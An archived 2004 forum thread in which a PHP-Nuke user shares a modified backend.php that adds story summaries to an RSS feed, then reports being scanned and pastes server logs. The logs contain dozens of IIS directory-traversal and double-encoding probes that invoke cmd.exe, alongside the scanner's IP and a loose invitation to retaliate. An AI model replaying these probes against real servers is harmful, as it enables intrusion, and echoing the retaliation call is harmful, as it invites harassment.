Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> General/Other Stuff
Author Message
oprime2001
Worker
Worker


Joined: Jun 04, 2004
Posts: 119
Location: Chicago IL USA

PostPosted: Fri Oct 15, 2004 6:56 am Reply with quote

I tried doing a search for backend.php before I posted this, but there were over 1600+ results. I apologize in advance if this is a repost.

Anyways, I wanted to beef up my backend.php / RSS feed to have more than the story title. After a quick search on google, I modified the v7.3 backend.php to look like:

Code:
<?php


/************************************************************************/
/* PHP-NUKE: Advanced Content Management System                         */
/* ============================================                         */
/*                                                                      */
/* Copyright (c) 2002 by Francisco Burzi                                */
/* http://phpnuke.org                                                   */
/*                                                                      */
/* This program is free software. You can redistribute it and/or modify */
/* it under the terms of the GNU General Public License as published by */
/* the Free Software Foundation; either version 2 of the License.       */
/*                                                                      */
/************************************************************************/
/* Additional security checking code 2003 by chatserv                   */
/* http://www.nukefixes.com -- http://www.nukeresources.com             */
/************************************************************************/
/* added summarize functionality             */
/************************************************************************/

// function summarize() from http://fundisom.com/phparadise/php/string_handling/summarize_article#
function summarize($paragraph, $limit,$link)
      {
          $tok = strtok($paragraph, " ");
          while($tok)
          {
              $text .= " $tok";
              $words++;
              if(($words >= $limit) && ((substr($tok, -1) == "!")||(substr($tok, -1) == ".")))
                  break;
              $tok = strtok(" ");
          }
          $text .= ' '.$link;
          return ltrim($text);
      }

include("mainfile.php");
global $prefix, $db, $nukeurl;
header("Content-Type: text/xml");
    $cat = intval($cat);
if ($cat != "") {
    $catid = $db->sql_fetchrow($db->sql_query("SELECT catid FROM ".$prefix."_stories_cat WHERE title LIKE '%$cat%' LIMIT 1"));
    if ($catid == "") {
   $result = $db->sql_query("SELECT sid, title, hometext FROM ".$prefix."_stories ORDER BY sid DESC LIMIT 10");
    } else {
   $catid = intval($catid);
   $result = $db->sql_query("SELECT sid, title, hometext FROM ".$prefix."_stories WHERE catid='$catid' ORDER BY sid DESC LIMIT 10");
    }
} else {
    $result = $db->sql_query("SELECT sid, title, hometext FROM ".$prefix."_stories ORDER BY sid DESC LIMIT 10");
}

echo "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n\n";
echo "<!DOCTYPE rss PUBLIC \"-//Netscape Communications//DTD RSS 0.91//EN\"\n";
echo " \"http://my.netscape.com/publish/formats/rss-0.91.dtd\">\n\n";
echo "<rss version=\"0.91\">\n\n";
echo "<channel>\n";
echo "<title>".htmlspecialchars($sitename)."</title>\n";
echo "<link>$nukeurl</link>\n";
echo "<description>".htmlspecialchars($backend_title)."</description>\n";
echo "<language>$backend_language</language>\n\n";

while ($row = $db->sql_fetchrow($result)) {
    $rsid = intval($row['sid']);
    $rtitle = $row['title'];

    $oprime2001_readmorelink = "/modules.php?name=News&amp;file=article&amp;sid=$rsid";
    $link = "&nbsp;<a href=".$oprime2001_readmorelink.">read more</a>";

    $rhometext = summarize($row['hometext'],10,$link);
    echo "<item>\n";
    echo "<title>".htmlspecialchars($rtitle)."</title>\n";
    echo "<link>$nukeurl/modules.php?name=News&amp;file=article&amp;sid=$rsid</link>\n";
    echo "<description>".htmlspecialchars($rhometext)."</description>\n";
    echo "</item>\n\n";
}
echo "</channel>\n";
echo "</rss>";

?>


This backend.php summarizes the hometext to return the sentence(s) that contain the first x words (currently set to 10).
 
View user's profile Send private message
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17077

PostPosted: Fri Oct 15, 2004 3:30 pm Reply with quote

Please post your site url so we can see how it looks. Thanks!
 
View user's profile Send private message
oprime2001
PostPosted: Sat Oct 16, 2004 1:47 pm Reply with quote

Here's a demo site that I use to test mods and hacks before I roll-out the changes to my production sites. Warning: slow connection!

REMOVED

The "beefed-up" backend.php for that demo site is REMOVED.


Last edited by oprime2001 on Mon Oct 18, 2004 2:42 pm; edited 1 time in total 
64bitguy
The Mouse Is Extension Of Arm


Joined: Mar 06, 2004
Posts: 1159
Location: Sanbornton, NH USA

PostPosted: Sat Oct 16, 2004 11:15 pm Reply with quote

I would suggest changing the line:
Code:
header("Content-Type: text/xml");

To actually read:
application/rdf+xml
Code:
header("Content-Type: application/rss+xml");


This will make it a valid RSS file (so the server doesn't report it as ASCII).

_________________
Steph Benoit Only registered users can see links on this board! Get registered or login!
1CMS, 100% Section 508 and W3C XHTML/CSS Compliant (Truly) 
View user's profile Send private message Visit poster's website
oprime2001
PostPosted: Mon Oct 18, 2004 2:00 pm Reply with quote

I've gone ahead and taken down the demo site because of some fothermucker who's been sending hack attempt after hack attempt. Plus, running the server apps in the background was slowing down everything else on my computer.

I'm assuming it's someone who reads these boards because I've only ever listed the address here. If you want to see the "beefed-up" rss feed, just make a backup of your old backend.php and upload the code above.

Anyways, here are the log lines for those who wants to send the fothermucker some love/"justice":
Quote:
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:47 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 385
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:47 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 385 "-" "-"
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:48 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 383
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:48 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 383 "-" "-"
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:49 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 393
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:49 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 393 "-" "-"
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:49 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 393
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:49 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 393 "-" "-"
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:50 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 407
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:50 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 407 "-" "-"
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:50 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 424
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:50 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 424 "-" "-"
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:51 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 424
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:51 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 424 "-" "-"
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:51 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 440
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:51 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 440 "-" "-"
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:52 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 406
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:52 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 406 "-" "-"
67.123.85.122 - - [18/Oct/2004:07:17:53 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 402
67.123.85.122 - - [18/Oct/2004:07:17:53 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 402 "-" "-"
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:53 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 406
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:53 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 406 "-" "-"
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:54 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 406
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:54 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 406 "-" "-"
67.123.85.122 - - [18/Oct/2004:07:17:54 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 393
67.123.85.122 - - [18/Oct/2004:07:17:54 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 393 "-" "-"
67.123.85.122 - - [18/Oct/2004:07:17:54 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 393
67.123.85.122 - - [18/Oct/2004:07:17:54 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 393 "-" "-"
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:55 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 407
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:55 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 407 "-" "-"
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:55 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 407
adsl-67-123-85-122.dsl.snfc21.pacbell.net - - [18/Oct/2004:07:17:55 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 407 "-" "-"


The momo is on a dsl connection so it's prolly a bit harder for the id10t to get a new IP. Complaint and copy of logs sent to Only registered users can see links on this board! Get registered or login!.
 
64bitguy
PostPosted: Mon Oct 18, 2004 2:34 pm Reply with quote

Looks like a script kiddie to me.

You should also be sure to file an FBI Hacker complaint as this one is EASILY trackable and as it is a DSL customer, they can immeidately trace the name and address of the persons involved and act to enforce current law.

Can you say $10,000.00 fine and a year in jail?
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> General/Other Stuff

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©